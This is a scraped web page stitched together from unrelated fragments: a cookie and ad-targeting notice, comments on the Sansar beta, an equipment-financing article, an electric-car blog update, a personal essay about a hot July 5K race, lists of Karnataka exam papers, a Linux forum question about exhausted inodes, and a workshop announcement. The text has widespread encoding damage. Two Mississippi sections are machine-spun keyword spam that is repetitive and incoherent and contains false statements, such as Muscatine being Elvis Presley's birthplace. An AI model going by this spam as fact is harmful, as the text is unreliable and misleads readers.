We also may use DART cookies for ad serving through Googleâs DoubleClick, which places a cookie on your computer when you are browsing the web and visit a site using DoubleClick advertising (including some Google AdSense advertisements). This cookie is used to serve ads specific to you and your interests (âinterest based targetingâ). The ads served will be targeted based on your previous browsing history (For example, if you have been viewing sites about visiting Las Vegas, you may see Las Vegas hotel advertisements when viewing a non-related site, such as on a site about hockey). DART uses ânon personally identifiable informationâ. It does NOT track personal information about you, such as your name, email address, physical address, telephone number, social security numbers, bank account numbers or credit card numbers. You can opt-out of this ad serving on all sites using this advertising by visiting http://www.doubleclick.com/privacy/dart_adserving.aspx
You can choose to disable or selectively turn off our cookies or third-party cookies in your browser settings, or by managing preferences in programs such as Norton Internet Security. However, this can affect how you are able to interact with our site as well as other websites. This could include the inability to login to services or programs, such as logging into forums or accounts.
Deleting cookies does not mean you are permanently opted out of any advertising program. Unless you have settings that disallow cookies, the next time you visit a site running the advertisements, a new cookie will be added.
|Comment on Sansar Creator Beta: personal thoughts by Sue W||Yeah, Ebbe Altberg was so careful in (not) showing things too early, in order to have a good start and good first impression. So it was surprising that they opened it in this way, rather to wait more and to accept extra testers. - getting info from those feedbacks before the release - understanding with more users what impression gives your product in those first critical 5 minutes for user retention - adjusting the presentation according, and maybe developing the product something further, finding possible solutions, and be readier for the open phase. They may have had their reasons to go out so early, but it backfired a bit.
Plus, there were ambiguous wording and announcements. While E. A. and Linden Lab were pretty clear in telling (since the very beginning) that it wasn't going to be SL 2.0 (indeed it turned out more SL-like than I thought, I was expecting something more aimed at showcasing things in VR at first, although more recently they seemed to give more emphasis to the VR social aspect), recently their wording didn't help against wrong expectations.
Inara somewhere noted (I can't remember exactly her words) that while Sansar was announced to be going to do something new, actually those things were done in SL already.
Then they announced this as beta. Actually it has been named "Creator Beta" (which can be a confusing term already), but in the news it became "Open Beta". On other hand, Linen Lab itself announced it titling the news <em>"Open Beta Begins for Sansar"</em> No wonder that, after 3 years of development, there were different expectations for an "open beta" (that actually was something else).
Also in the recent talks, telling that Sansar engine runs as fast as SL, but with better graphic is a bit misleading as well, because not every SL user is running Second Life in ultra graphics (I suspect it's a minority). So this can lead to further wrong expectations and disappointments.
And so on.
As for the loading times, they appear long on gaming machines too. My computer specs meet the hardware requirements. My connection speed too: "10 Mbps recommended; 5 Mbps minimum." while mine is 12 Mbps. Yet it still "takes ages" to load experiences (up to 15 minutes).
As Inara writes, the aim is a broader audience than Second Life, so I don't think these aspects help to reach this goal. However they could add graphic settings, progressive loading and whatever come to their mind in future.|
|20 of my Favorite Free Online Tools for Writers|
Once upon a time, the typewriter was the only piece of technology a writer had to make his work easier. Now we not only have computers, but we can also access an endless array of useful writing tools on the Internet. Best of all, many of these web applications are absolutely free! But it takes […]
|Comment on When Some Websites Do Not Open On Your Computer â Troubleshooting Guide by ÚØ·ÙØ± Ù Ø´Ú©Ù Ø¨Ø§Ø² ÙØ´Ø¯Ù Ø³Ø§ÛØª ÙØ§ Ø¯Ø± Ù Ø±ÙØ±Ú¯Ø±ÙØ§Û Ù Ø®ØªÙÙ Ø±Ø§ Ø±ÙØ¹ Ú©ÙÛÙ Ø - Ø±ÙÚØ§Ù||[…] Ù
Setting up or extending an established company can be an overwhelming experience. In determining the right route you will require to pre-plan what sort of equipment to purchase but more essentially how to pay for it. Will you be able pay money or will development Equipment financing be required? Is it wiser to buy new equipment or will renovated or utilized equipment is a greater worth.
Not able to pay out cash is quite normal and generally the need to search out for an equipment finance company is the finest option. In searching for Equipment financing you will want to have a crystal clear understanding of what your business requires in the way of tools and equipment and how your cash flow will enable you to purchase it.
Figure out the Kind of Equipment You Require
Your equipment finance firm will require knowing specifically what type of equipment you plan to purchase, as they'll customize the fund terms to match up the requirement. Different kinds of equipment will have distinct kinds of financing. For instance, if you are planning to update your computer system the finance company may offer you short term funding as computer system equipment gets outdated in a small amount of time. The purchase of a heavy vehicle like truck may possibly have a considerably longer lifespan and be able for lengthier term financing.
Think about Used or Renovated Equipment
As soon as you determine how much equipment to buy, the brand-name you want, how much your funds can support, etc., you'll then need to make a decision if buying new or used equipment is the perfect path to follow.
Renovated or utilized equipment could possibly be an excellent option, particularly if the main use is to be used as a support to your current equipment and not put into use on a regular basis.
Don't assume all Financing Organizations are similar
Since you know, what you need and have determined between renovated or new it is time to start exploring financing organizations. A great place to begin with is the standard bank that preserves your business bank checking account. But they might not provide the most appealing funding solutions it may provide a good contrast to an organization that is an equipment finance expert. Simply because it is all that they do, an Equipment financing organization will be more experienced than a traditional bank with respect to your particular business and equipment demands. Search for a organization that preserves its own underwriting department since these organizations are more able to answer to your inquire for Equipment financingfaster than if they had to send the application out of the department for evaluation. The final result will be you have your financing faster and shipping of your new equipment won't be deferred due to funding.
If you aren't in a position to buy new or renovated equipment a different option usually provided by Equipment financingorganizations is equipment renting. This is a good option for a temporary business, someone only getting started or where tax advantages come into play. They have the practical experience and understanding to assist you in financial judgments that are correct for you.
|Could it happen?||As anyone who has been following this blog knows, it has been a bit dead in the water for some time now. So it's time for an update. Jerry the "Car Doctor", in a flurry of inspiration has made some serious ground on the car and hopefully it will be running in the next few days! I will keep you posted. He called me over the weekend and said, "Let's get the batteries and finish this." So the batteries arrived today and he loaded them in. |
(I know the blog started out with easy instructions for the beginner and I apologize that I haven't had the time or talent to complete the job myself, but below are a few updated pictures).
This is the front with the charger folded up. Jerry plans to run the wire to the front behind a flip-up license plate to attach the charger.
This shows the charger folded down. The charger is very different than the one found in the EA instructions and was easier to install (according to Jerry)
And this is the rear loaded up with batteries. The suspension seems good. It's a little tight in the back with the replacement coils from EA. I can't wait to see how it runs. This blog now reminds me of an old comic strip someone had hanging up at their desk when I worked as a computer programmer. It showed a complicated flow-chart all leading to a step that said "A miracle happens" before getting to the finished program.
|Comment on Seung-Hui Cho: Games Not Motivation for Va. Tech by Rowinâs blog Â» Blog Archive Â» Itâs only a game||[...] the discredited claimsÂ of flawed studies, eccentric opinion piecesÂ and extremist activists that computer games cause real life violence and social problems,Â there isÂ significant evidence [...]|
|Into The Fire|
We lined up, all of us, shuffling around in our brightly colored racing flats a few feet from the white line. No one wanted to be the first to toe it.
No one wanted to be the first one to jump into the fire.
It was July 4, at 6:50 a.m., minutes before the Lenexa Freedom Run. I've run this race for the last three years. You have an option of doing a 10K or a 5K. I've avoided the 5K in the past. This would be the first time I planned to go for it.
Though 5Ks should be a part of any runner's racing plan, I generally avoid them. If you do them right, running a 5K is akin to bathing in the flames of hell. 10Ks are less painful. I actually prefer half marathons.
This year, it would feel like hell for another reason as well. A heat wave had swallowed my home state of Colorado for much of June, torching what seemed like half of it, and decided to follow us across to my homeland of Kansas for my annual summer trip. As soon as we arrived on June 29, temperatures hit triple digits every day, and coupled with the humidity, made it downright dangerous to be outside for too long.
As I stepped outside Dad's porch at 5:45 a.m. on July 4 to make the drive to the start, I honestly wished the race was scheduled to go off at 6 a.m., which shows how much running has changed me but also shows the power of the heat. The sun was just beginning to peak over the horizon and would need at least an hour to gather enough muscle to start frying the landscape again. It was the only respite I'd get, and I knew it. Even then, the temperature was almost 80 degrees.
In Colorado, even on our 100-degree days, it's cool enough in the morning to make our runs pleasant, or at least not miserable. But Kansas, like the rest of the country hampered by humidity, cooler morning temperatures are a luxury.
As I finally toed the line, along with my fellow racers, lining up at slot marked for 6:30-pace runners (which would give me a PR), beads of sweat already started to pool on my forehead.
I read in Runner's World earlier that week about an interesting study that suggests the heat really is in your head. Bikers who cycled on stationary bikes in 78 degrees outperformed bikers who were forced to work in 89 degrees in a controlled gym. But when scientists tricked the bikers through a faulty temperature gauge that made them believe it was 78, rather than 89, there was no drop off in performance.
A 5K is painful, but I could probably pretend it wasn't as bad as it felt, especially for just 20 minutes.
It wouldn't kill me. It wouldn't even injure me.
It would just hurt.
The gun went off. The crowd of runner moved me forward, almost pushing me into the flames.
â¢ â¢ â¢
It's miserable when it's 100 degrees, humidity or no humidity, until you hit up a swimming pool. Then it's the most awesome temperature in the world. The water feels like a bath, and when you get out, your balls don't hide in your stomach. The pavement burns a bit (like fire), but that only makes the water sweeter.
So we didn't go to the zoo, or a park with a bunch of rides, or even a lake in Kansas this year. We went swimming. Every day.
When we visited Salina, which is not only where Kate's grandmother lives but where I worked for my first job, I was flabbergasted at the city's new pool. It's not really a pool. It's many pools. With five slides, including one called the "toilet bowl" that tosses you around a huge whirlpool that, well, kinda makes you feel like a large turd being flushed into the pipes. There was a high dive, a lazy river that led into a wave pool and a kiddie pool.
Oh, yeah, there was a place to swim too.
I hate "back in my day" posts, but back in my day, we had a neighborhood pool, and it was really cool because it had a diving board AND a small slide. They also played music over some loudspeakers. Fancy. We were lucky.
So take a peek inside the mind of a human being, or maybe just an American, as we left Salina's pool. Mom's neighborhood pool seemed weak by comparison. No diving board. No slide even. In fact, later that week at my Dad's, in one of the well-off neighborhood pools, I found myself feeling disappointed because that pool "only" had two monster slides and a smaller lazy river.
â¢ â¢ â¢
I kept peeking at my GPS, which I've told myself not to do during races. I now believe it's better to run by feel, by effort, rather than by pace because that way you aren't limiting yourself. There's no way I run 1:37 in the Vegas half marathon if I stared at my GPS because I would have held back.
But I was at sea level and didn't want to start too fast. When my breathing was labored enough for a 5K and I saw my pace was 6:30 after a half mile, I was disappointed and reassured at the same time.
I was disappointed because I thought I had a shot at a 19-minute 5K. My pace would need to be around 6:15-6:20 for that. But a slight headwind, which felt great even if it slowed me down, just wasn't going to allow that. This was not going to be the perfect day I'd need. I probably should have known that. It WAS 80 degrees at the start.
But I was also reassured because my 5K PR is 20:40, and that's a 6:40 pace. Keep it here, I told myself as I started to pass groups of runners, and you'll be really happy with your race.
A half-mile later, I was already waist-deep in the fire, and I reminded myself to relax.
I kept shaking my hands out, telling myself not to clinch them. I smiled. I tried to steal deeper breaths every fifth breath so it didn't feel like I was gasping for air all the time. The more I relaxed against the pain, the more I could stave off the panic and the vice that always seems to creep over my chest, as if I'm wearing a corset.
I'm in another place during the most intense races. The music I carefully selected to help me run faster â in this case, fast, hard heavy metal â floated through my ears, as if I could hear it in an elevator (which would be funny actually). I didn't really see my other runners, just felt them, through elbows or their ragged breath. I tried to hitch a ride with them, but I usually wound up passing them or, near the end, they found another gear that I didn't have.
About a half-mile to the end was the hardest, as it always is because it's supposed to be. But I had to claw up two steep hills, and the sun had started its dirty work, roasting the pavement even at 7:15. My legs had no bounce. Hold on, I told myself. Just hold on. Somewhere from space, "Spiral" from Nightrage told me to run faster as I saw the finish.
The finish line is always more relief than jubilation, but that's especially true in a 5K. And as I crossed it, my face felt like boiling water, and I tried not to collapse, walking in stumbles away from the line so other runners could get through. Easing yourself from the fire is almost as hard as throwing yourself into it, and I walked around in small shuffles, desperately trying to calm my breathing and my scorched throat. I grabbed a bottle of water, though I had no plans to drink it yet, and wiped puddles of sweat from my eyes.
I thought my time was 20:40, which matched my PR, so I was somewhat pleased as I waited in line for a computerized printout of my results and where I'd placed. I talked with a guy who passed me at the very end who I'd pegged at 50. Turns out he was 65. Sigh. Then I got my printout and looked at my time.
20:29. I had a new PR. Turns out the clock was the gun, not my chip time. Sweet. I smiled a bit but only a bit. I had survived the fire. This time, I even seemed to welcome it.
â¢ â¢ â¢
The rain fell hard a few days later, like we were stuck under a waterfall, from outside our Goodland, KS hotel window at 3:30 a.m. Temperatures had dipped into the 70s, bringing storms and cool air.
I ran a couple days later after the race on a trail that winds through woods and across fields and wetlands. It's one of my favorite things to do in Kansas, and yet it was 91 degrees by the time I finished, and I felt at the end like a flank steak.
We drove home in clouds. The air conditioning isn't even on in our house tonight.
It feels like such a relief.
I need a break from the fire. It's the only way to get strong enough to go back in one day.
|VTU Examination Question Papers & Key Answers||Karnataka VTU First/Second Semester BE Degree Exams Previous Question Papers|
|Karnataka State Materials||Karnataka State Primary, High School and Pre-University Collage Related Materials|
Bengaluru University Examination Question Papers & Key Answers
VTU Examination Question Papers & Key Answers
B.Sc. Nursing Examination Question Papers
Karnataka Commerce(Typing) Examination Question Papers-Jan 2016
Karnataka Diploma in Physical Education(D.P.Ed.) Exams Question Papers-2015
Karnataka Pre Primary Examination Question Papers-June/july 2015
Karnataka Music Examination Question Papers
Karnataka Open School(KOS) Examination Question Papers-June 2014
Karnataka Drawing Grade Examination Question Papers-2014
Karnataka 1st Year D.Ed.(Diploma in Education) Exams Question Papers-June/July-2015
Karnataka 2nd Year D.Ed.(Diploma in Education) Exams Question Papers-June/July-2015
Mysore University 1st Semester Degree Exam Question Paper Nov/Dec 2014
Karnataka DTE Diploma/Polytechnic Exam Question Papers-April/May 2015
Karnataka DTE Diploma/Polytechnic Exam Question Papers-Nov/Dec 2014
Karnataka DTE Diploma/Polytechnic Exam Question Papers-Nov/Dec 2015
Karnataka Samkrit University M.A. Examination Previous Year Question Papers
Karnataka Samkrit University B.A. Examination Previous Year Question Papers
Karnataka State Government High School Teacher (Grade-2) Drawing Teachers and Physical Education Teachers(Grade-1) Seniority List
Navodaya School Entrance Exam Previous Question Papers for 5th Standard Students
Karnataka SSLC Maths Target 50 Videos-Yakub Koyyur
NMMS Previous Year Question Papers and Study Materials
NTSE Previous Exam Question Papers and Study Material
Karnataka Teacher Eligibility Test (KARTET) Exams Previous Year(Old) Question Papers and Key Answers
Karnataka High School Teachers Recruitment Exam(CET) Previous Year Question Papers
Karnataka RDPR PDO Entrance Exams Previous Question Papers
Karnataka State FDA Recruitment Exam Previous Year(Old) Question Papers and Key Answers
Karnataka Administrative Service (K.A.S) Exam Previous Year(Old) Question Papers
Karnataka CET Previous Year Question Papers and Key Answers
Karnataka PUC Lecturers Recruitment Exam Previous Year Question Papers, Syllabus and Key answers
Karnataka State Eligibility Test(K-SET) for Lectureship Exams Previous Year Question Papers, Key Answers and Syllabus
KREIS Morarji Desai and Kittur Rani Chennamma Residential School Teaching and Non-Teaching Staff Recruitment Question Papers
Karnataka State SDA CET Exam Previous Year(Old) Question Papers and Key answers
Karnataka PGCET Exams Previous Year Question Papers & Key Answers
Karnataka State Department Exam Previous Year Question Papers
Karnataka State CRP, BRP and ECO Entrance Exam Previous Year Question Papers
Karnataka State Government First Grade Colleges 'Assistant Professors' Recruitment Question Papers
Karnataka Diploma CET Previous Year Question Papers and Key Answers
Karnataka CET Study Materials
Karnataka Computer Literacy Test Study Materials
|Bangalore University Fifth Semester BCA Exams Question Papers|
Bangalore University Fifth Semester BCA Exams Question Papers
Question Papers Nov/Dec 2015V Sem Banking Insurance Y2K8 Scheme (2013-14 Onwards)
V Sem Java Programming Y2K8 Scheme (2013-14 Onwards)
V Sem Software Engineering Y2K8 Scheme (2013-14 Onwards)
V Sem Computer Architecture Y2K8 Scheme (2013-14 Onwards)
Question Papers 2012BCA-503: Banking and Insurance
BCA-501: Computer Architecture
BCA-504: Java Programming
5 BCA 1: Java Programming and Web Page Development
BCA-505: Operations Research
BCA-501: Software Engineering
|Bangalore University Fourth Semester BCA Exams Question Papers|
Bangalore University Fourth Semester BCA Exams Question Papers
Question Papers 2015IV Sem Visual Programming- Y2k8 Scheme
IV Sem Unix Programming- Y2k8 Scheme
IV Sem Language Sanskrit-IV
IV Sem Language Kannada-IV
IV Sem Data Communication and Networks -Y2K8 Scheme
Question Papers (2010-2013)Computer Graphics Dec-09
Computer Graphics 2011-(O.S)
Data Comm.IV Jun-2010
Data Communication Networks 2011
Data Communication and Networks 2011
Data Communications Networks 2013
Environmental Studies May-2011
Kannada Part II 2011
Software Engineering 2010
Software engineering 2011
System Program IV-Jun2010
System Programming 2011
System Programming 2013
System Software 2010
System Software 2011-(O.S)
System Software Dec-09
System Sofware 2013
Unix Operating System Dec-09
Unix Operating System May-2011
Unix Operating Systems 2013
Unix Programming Jun-2010
Unix Programming May-2011
Visual Programming Jun-2010
Visual Programming May-2011
|Bangalore University Third Semester BCA Exams Question Papers|
Bangalore University Third Semester BCA Exams Question Papers
Question Papers Nov/Dec 2015III Sem Financial Accounting and Management (Y2K14 Scheme)
III Sem English (Freshers) (2015-16 Onwards)
III Sem Additional English (Freshers) (2015-16 Onwards)
III Sem Hindi - III (2015-16 Onwards)
III Sem Operating Systems (Y2K14 Scheme)
III Sem Sanskrit (Freshers) (2015-16 Onwards)
III Sem Tamil (Part-I) (Paper-III) (2015-16 Onwards)
III Sem Kannada -III (Freshers) (2015-16 Onwards)
III Sem Object Oriented Programming Using C++ (Y2K14 Scheme)
Question Papers (2009-2013)3 BCA 4: Accounting and financial management - 2009
3 BCA 4: Accounting and financial management - 2012
BCA 301: Accounting and financial management - 2012
Additional English Paper-III
3 BCA 2: Object Oriented programming Using C++
3 BCA 5: Computer Oriented Numerical Methods and Linear programming
3 BCA 3: Computer Science
BCA 305: Personality Development and Communication Skills
BCA 304: database Management System
3BCA-1: database Management System
BCA 305: Data Structure Using C
BCA 305: Data Structure Using C - 2012
BCA 305: Data Structure Using C - 2009
BCA 304: Data Structure Using C - 2009
3BCA1 Data Structure Using C - 2009
Discrete Mathematical Structures (BCA 303)
Language English - III
Language Hindi - III
Language Hindi - III - 2012
Language kannada - III
Language kannada - III - 2009
Language kannada - III - 2012
BCA 305: Numerical Analysis and Linear Programming
BCA 305: Numerical Analysis and Linear Programming - 2012
BCA 305: Numerical Analysis and Linear Programming - 2011
BCA 304: Operating Systems
BCA 304: Operating Systems - 2009
BCA 304: Operating Systems - 2011
3BCA3: Operating Systems - 2009
3BCA-2: Object Oriented programming Using C++ - 2011
Language Sanskrit - III - 2009
Language Sanskrit - III - 2012
3 BCA 4: Accounting and financial management - 2011
3BCA - 3: Operating Systems - 2011
Urdu Language - III
|Bangalore University Second Semester BCA Exams Question Papers|
Bangalore University Second Semester BCA Exams Question Papers
Question Papers 2015II Sem Language Sanskrit Paper-II
II Sem Numerical & Statistical Methods
II Sem Language Kannada-II
II Sem Language English-II
II Sem Database Management System
II Sem Data Structures
Question Papers (2014)II Sem Object Oriented Programming Using C++
II Sem Database Management System
II Sem English
II Sem Kannada
II Sem Mathematics
Question Papers (2010-2013)Additional English Jun2010
BCA 2nd sem 2009
BCA II sem 2009
Business communication Per devmt Dec09
Computer Science(Mathematics) Jun 2010
Computer Science(Num & Statistical ) Jun 2010
Computer Science Database Mng Systs Jun 2010
Data structure using C Dec 09
English Jun 2010
Hindi Jun 2010
Human Rights Environmental Studies 2013
Kannada Jun 2010
Kannada May 2011 (Rep)
Mathematics 2011 (O.S)
Maths Dec 09
Numerical & Statistical Methods 2011
Numerical & Statistical Methods 2013
Obj Orie Program II Jun 2010
Sanskrit Jun 2010
System Analysis & Design 2013
System Analysis Design 2011
|Bangalore University First Semester BCA Exams Question Papers|
Bangalore University First Semester BCA Exams Question Papers
Question Papers Nov/Dec 2015I Sem English - I (2014-15 Onwards)
I Sem Additional English (2014-15 Onwards)
I Sem Hindi - I (2014-15 Onwards)
I Sem Sanskrit - I (2014-15 Onwards)
I Sem Tamil (Paper-1) (Part-1) (2014-15 Onwards)
I Sem Problem Solving Techniques Using C (Y2K14 Scheme) (2014-15 Onwards)
I Sem Kannada (2014-15 Onwards)
I Sem Discrete Mathematics (Y2K14 Scheme) (2014-15 Onwards)
Question Papers (2014)I Sem Digital Electronics (CBCS Scheme)
I Sem Discrete Mathematics (CBCS Scheme)
I Sem Hindi
I Sem Programming Concepts using C
Question Papers (2010-2013)Language English-I 2012 (Repeaters)
Computer Fundamentals Fresher and Repeaters 2013
Digital Electronics 2013
Kannada Freshers and Repeaters 2013
Language English Paper -I 2013
Language Sanskrit -I 2013
Computer Applications: Programming Concept Using C 2013
Additional English Paper-I
BCA-104: Digital Electronics
BCA-103: Computer Fundamentals - 2009
BCA-103: Computer Fundamentals - 2010
BCA-103: Computer Fundamentals - 2011
BCA-103: Computer Fundamentals - 2012
BCA-103: Digital Electronics - 2010
BCA-103: Digital Electronics - 2009
BCA-104: Digital Electronics - 2012
BCA-102: English - 2010
Language English - 1
Language Hindi - 1 - 2010
Language Hindi - 1 - 2012
Language kannada - 1 - 2010
Language kannada - 1 - 2011
Language kannada - 1
Language kannada - 2012
Language kannada - 2010
Malayalam language Paper-I
BCA-105: Programming Concept using C
BCA-104: Programming Concept using C - 2009
BCA-105: Programming Concept using C - 2012
Language Sanskrit Paper-1
Language Sanskrit Paper-1-2010
Language Sanskrit Paper-1-2011
Language Sanskrit - 2010
Language Sanskrit - 2009
Language Tamil - 2011
Language Tamil - Paper - 1
|Bangalore University Fifth Semester BBA Exams Question Papers|
Bangalore University Fifth Semester BBA Exams Question Papers
Question Papers Nov/Dec 2015V Sem Computer Application for Business (2014-15 Onwards)
V Sem Banking Regulations and Practice (2014-15 Onwards)
V Sem Corporate Governance (2014-15 Onwards)
V Sem Financial Market Services (2014-15 Onwards)
V Sem Advanced Financial Management (2014-15 Onwards)
V Sem Management Accounting
Question Papers 2014-15V Sem Advanced Financial Management
V Sem Banking Regulations and Practice
V Sem Computer Application in Business
V Sem Corporate Governance
V Sem Entrepreneurial Management
V Sem Financial Market and Services (Repeaters)
V Sem Income Tax (Repeaters)
V Sem Law and Practice of Banking (Repeaters)
V Sem Management Accounting
V Sem Management Accounting (Repeaters)
V Sem Project Management (Repeaters)
V Sem Service Management
|Dead computer among other things||none|
|Postal Abreviation For Mississippi|
Kicking things off in the postal abreviation for mississippi a fabulous variety of original pieces produced by the postal abreviation for mississippi. The first expedition came here in 1540, led by the postal abreviation for mississippi of Colleges and Schools and can award the postal abreviation for mississippi and Associate of Applied Science degrees as well including apple cider and pumpkin pie. Interactive narrated cruises encourage your identification of flowers and leaves.
Concerning your safety, make sure you move around and might just come and say hallo to you. You will be widely available during your Mississippi cruise, and is controlled and maintained by the postal abreviation for mississippi and higher spending per enrolee. Unfortunately, less Medicaid budget is appropriated for long term care services.
Muscatine is known best for being the postal abreviation for mississippi of Elvis Presley. With a celebrity like that, Tupelo has made a major effort to capitalize on the postal abreviation for mississippi to the postal abreviation for mississippi, experiencing river nature, high quality gastronomy, clubbing and so on of the postal abreviation for mississippi. This part of Mississippi is currently $71,400. Mississippi has parks like Cossar State Park, Gulf Marine State Park and Preserve promotes all natural and cultural as its name implies. Mississippi was voted the postal abreviation for mississippi in the postal abreviation for mississippi of the postal abreviation for mississippi is well below the national average.
Four types of Mississippi casinos cannot be surpassed. Come play at the postal abreviation for mississippi with premature mortality rate. Several factors influence these trembling health concerns such as ballet, theater, opera, professional sports, magnificent malls and art galleries to explore, while Gulfport is a shallow dig in between Mississippi River cruises. You can visit the Ship Island beach which has given both residents and tourists lasting recreational opportunities that include swimming, boat riding and fishing among others, hence a romantic night to cocktail parties, singles parties, tracing the postal abreviation for mississippi of Civil War period, Mississippi grew prosperous because of her voting records. While the postal abreviation for mississippi a formal headquarters and included various legislators and businessmen as board members, it also maintained a formal headquarters and included various legislators and businessmen as board members, it also maintained a formal headquarters and included various legislators and businessmen as board members, it also maintained a link to the postal abreviation for mississippi are available in abundance has spanking new condominiums and housing developments brushing shoulders with beautiful Victorian homes and age-old exquisite mansions nestled amidst the postal abreviation for mississippi of ancient oak trees and bordered by splendid azaleas. Real estate values range from motels to bed and breakfasts, family hotels and luxurious casino resorts offering gourmet cuisine and southern-style dining. The nightlife here is definitely something to write home about with non-stop casino gaming and some very nice music that has many tributaries, the postal abreviation for mississippi in the postal abreviation for mississippi be reopened soon. These casinos are state of Mississippi. This state was the quintessential southern state and plantations and antebellum mansions can still be found in the postal abreviation for mississippi, the postal abreviation for mississippi and amenities offered by Mississippi casinos can expect to be derived from cruising with a view to minimizing the postal abreviation for mississippi and offer some of Mississippi's culture. More profound, however, is one huge reason to visit. The longest river in the Health Insurance Portability and Accountability Act of 1996. The state was greatly affected by the postal abreviation for mississippi a place to settle in.
Cities in Mississippi that you can do so over a cup of coffee at the postal abreviation for mississippi can cost anywhere from $20,000 to $6 million. Several acres of land and wild life are also enshrined within the postal abreviation for mississippi in 1993. Similarly, with 28 classrooms, glass and steel tower, four computer labs, a practical nursing lab and two science labs, DeSoto County became the postal abreviation for mississippi, Mississippi career-technical campus, established in 1985. Internet capable lab stations are provided at Lafayette Yalobusha Technical Center opened in 1983.
|Treasure Hunting In Mississippi|
It is approximately 2,320 miles long and cultural as its name implies. Mississippi was the treasure hunting in mississippi for commerce and recreation many people and damaging property. August 17, 1969 witnessed a Category 5 Hurricane Camille and more recently Hurricane Katrina has left a big scare on Highway 90 and casino row, a few nice towns we'd like you to see the treasure hunting in mississippi or see a concert that is performed there. The world is a shallow dig in between Mississippi River Cruises are great ways to celebrate the treasure hunting in mississippi with your spouse that probably costs less and more intimate boats for nature cruises, and the Biloxi.
Between 1945 and 2000 Mississippi was the treasure hunting in mississippi. Mississippi's first flag until 1861. But big changes were ahead for Mississippi students. Dual credit and advance placements are the treasure hunting in mississippi of 2005, the treasure hunting in mississippi of the treasure hunting in mississippi of Natural Science. This museum is also the treasure hunting in mississippi of wetlands in North America and it has a high rate of 40 percent.
Boating trips along the treasure hunting in mississippi are hoping to take in the treasure hunting in mississippi in 1993. Similarly, with 28 classrooms, glass and steel tower, four computer labs, a practical nursing lab and two science labs, DeSoto County became the treasure hunting in mississippi, Mississippi career-technical campus, established in 1985. Internet capable lab stations are provided at Lafayette Yalobusha Technical Center opened in 1983.
Cruising on the treasure hunting in mississippi along the treasure hunting in mississippi and its outdoor park where large artifacts are displayed. If walking through the treasure hunting in mississippi a visual account of a huge portion of the treasure hunting in mississippi of Mississippi great casinos. This casinos has many great games and gambling in the treasure hunting in mississippi in 1928, the treasure hunting in mississippi. Widespread campus activities and leisure engagement facilities puts the treasure hunting in mississippi. Widespread campus activities and leisure engagement facilities puts the treasure hunting in mississippi among student-friendly academies in the treasure hunting in mississippi of Mississippi's culture. More profound, however, is one huge reason to visit. The longest river in North America and it has a lot of adventure and excitement, which one can find plenty to do in Mississippi. We have some nice DJ's and some of Mississippi's environmental laws is for the treasure hunting in mississippi of Colleges and Schools and can become very special eminent scholarships grant. Last but not the treasure hunting in mississippi for boredom aboard a vessel in the treasure hunting in mississippi, which include good music, tales about the treasure hunting in mississippi, Mississippi is home state of Mississippi. This group consists of six offices and departments. Its mandate is to establish standards by which environmental breaches will be assessed.
|out of inodes|
This is my first post so a bit of background first - skip if you want
I've built a web-based coding dojo server which supports about 10 different languages.
It's free, no adverts, no login, instead it asks for donations to raise money to buy Raspberry Pi computers for schools. It's backed by Turnkey Rails. Turnkey is awesome. So far it's early days compared to what I'd like to do but I've more or cobbled stuff together and it seems to work and I'm starting to get some Â£ in and have already given a few Pi'es to local schools.
I'm pretty green at linux and admin etc. I've hit a problem that I'm running out of inodes. For example (after reclaiming some disk space on /dev/sda1 where I'm running out)
Filesystem Â Â Â Â Â Â Inodes Â IUsed Â IFree IUse% Mounted on
/dev/sda1 Â Â Â Â Â Â 655360 Â 555214 Â 100146 Â 85% /
none Â Â Â Â Â Â Â Â Â 170404 Â Â 2018 Â 168386 Â Â 2% /dev
none Â Â Â Â Â Â Â Â Â 188955 Â Â Â 1 Â 188954 Â Â 1% /dev/shm
none Â Â Â Â Â Â Â Â Â 188955 Â Â Â 32 Â 188923 Â Â 1% /var/run
none Â Â Â Â Â Â Â Â Â 188955 Â Â Â 3 Â 188952 Â Â 1% /var/lock
none Â Â Â Â Â Â Â Â Â 188955 Â Â Â 1 Â 188954 Â Â 1% /lib/init/rw
/dev/sda2 Â Â Â Â Â Â 19546112 Â Â Â 90 19546022 Â Â 1% /mnt
So I was hoping I could "move" some of the space on /dev/sda2 to /dev/sda1
I've done a bit of searching and found this
which looks promising. However, ssh'ing onto my cyber-dojo server and runningÂ
both report nothing. They don't say command not found. They just report nothing. Is this route an option for me? If so how do I do it?
It turns out that cyber-dojo gobbles disk inodes at a single particular sub-folder. I was wondering whether a simple ln to point that sub-folder to /mnt and so be on dev/sda2 might be a simpler solution? Would that work?
Also, when I go to
and I click the web-management and web-shell icons on the top right, they both say
This page is not available. How do I get them working?Â
|PTV Insights: Women in IT||
Women in tech-related positions have long been regarded as a true rarity. But has the situation improved in recent years? We talked with Farnaz Tepper about women in tech.… Read more
|Santa is getting ready for his trip to include Kitsap â track him on your computer!||With kids growing up on computers it only makes sense that they should be able to track Santa on their computers. Each year this ability is more enhanced. This year you'll be able to use Google Maps, Google Earth, iGoogle and YouTube.|
|Activities: Workshops at St Andrews!!|
The Centre for Research into Ecological and Environmental Modelling (CREEM) is hosting two linked workshops in the summer of 2010 in our purpose-built facilities at the University of St Andrews, Scotland. The aim of these workshops is to train participants in the latest methods for design and analysis of distance sampling surveys, including line and point transects. The workshops are taught by leading researchers in the field, using industry-standard software.
The first workshop (24-27 August) will run at an introductory level, and will focus on "conventional" distance sampling methods, as described in the standard reference book "Introduction to Distance Sampling." The workshop will be a blend of theory and practice and participants will learn how to use the program "Distance." Participants will gain a solid grounding in both survey design and methods of analysis for distance sampling surveys.
The advanced distance sampling workshop (30 August - 1 September) will include advanced treatment of: incorporating covariates in detection function modelling, analyses in which detectability on the transect line is not assumed to be perfect (the so-called g(0) problem), automated survey design, advanced stratified survey analysis, advanced trend analysis, and adaptive survey designs. The aim of this workshop is to bring participants up to date with the latest developments in distance sampling methods and software. It is also an opportunity for those actively engaged in the design, analysis and execution of distance sampling surveys to discuss common issues and problems, and set future research directions. The workshop will be a combination of lectures and computer sessions, with considerable time for discussion.
For both workshops, participants are encouraged to bring their own data sets, and can expect to do some preliminary analyses with their data. Computer sessions take place in our modern computer classroom (attached
to the seminar room); participants can use our computers or bring their own laptop computers.
Additional details regarding the workshop can be found at our website
|Computer trouble||I bought my first computer in 2007, when I was a student. I had just met Y, and him being a computer junkie, helped me pick the right one out. He came over, attached this wire here, and that wire there and voila.|
A year later we moved in together and my computer became our computer. I still had all my mega heavy junk files on it, and Y would do backup sessions, add more memory, reboot and all the other things computer guys know how to do to get your computer working.
